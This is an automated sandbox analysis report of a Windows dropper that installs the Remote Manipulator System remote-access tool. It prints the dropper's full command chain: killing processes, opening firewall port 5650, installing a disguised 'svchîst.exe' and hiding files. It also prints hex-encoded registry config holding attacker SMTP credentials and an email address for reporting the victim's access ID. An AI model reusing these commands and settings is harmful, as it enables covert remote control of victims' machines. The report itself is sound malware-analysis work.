Analysis

  • max time kernel
    141s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    27-04-2022 16:29

General

  • Target

    c898ccec06ea61efb066828ae11faf50aa6506903f2bcc6dd4da26276eb49414.exe

  • Size

    8.4MB

  • MD5

    d14d0d68b4b5301de2f4c106dac670a6

  • SHA1

    a0e9ccce6066bb54570b1c2c412ee31b3c8dbcc9

  • SHA256

    c898ccec06ea61efb066828ae11faf50aa6506903f2bcc6dd4da26276eb49414

  • SHA512

    1e90b7125bcd00f3e4636177a932ee16eaf4d9bedb72b319a2d7fbe9b0ec1903a5f71b8b2183739488b3657d586666e6d6fc4231524b9acdbd77a9d6d6719490

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Drops file in Drivers directory 6 IoCs
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 21 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 19 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c898ccec06ea61efb066828ae11faf50aa6506903f2bcc6dd4da26276eb49414.exe
    "C:\Users\Admin\AppData\Local\Temp\c898ccec06ea61efb066828ae11faf50aa6506903f2bcc6dd4da26276eb49414.exe"
    1⤵
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
      2⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im rutserv.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1028
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im rfusclient.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:520
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        3⤵
          PID:2004
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add portopening TCP 5650 "Open Port 5650"
          3⤵
            PID:1036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
            3⤵
              PID:1960
            • C:\Windows\SysWOW64\drivers\install.exe
              "C:\Windows\System32\drivers\install.exe"
              3⤵
              • Executes dropped EXE
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
                4⤵
                  PID:1548
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
                    5⤵
                    • Modifies registry class
                    PID:1728
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
                  4⤵
                    PID:1504
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
                      5⤵
                      • Modifies registry class
                      PID:1636
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
                    4⤵
                      PID:908
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f7265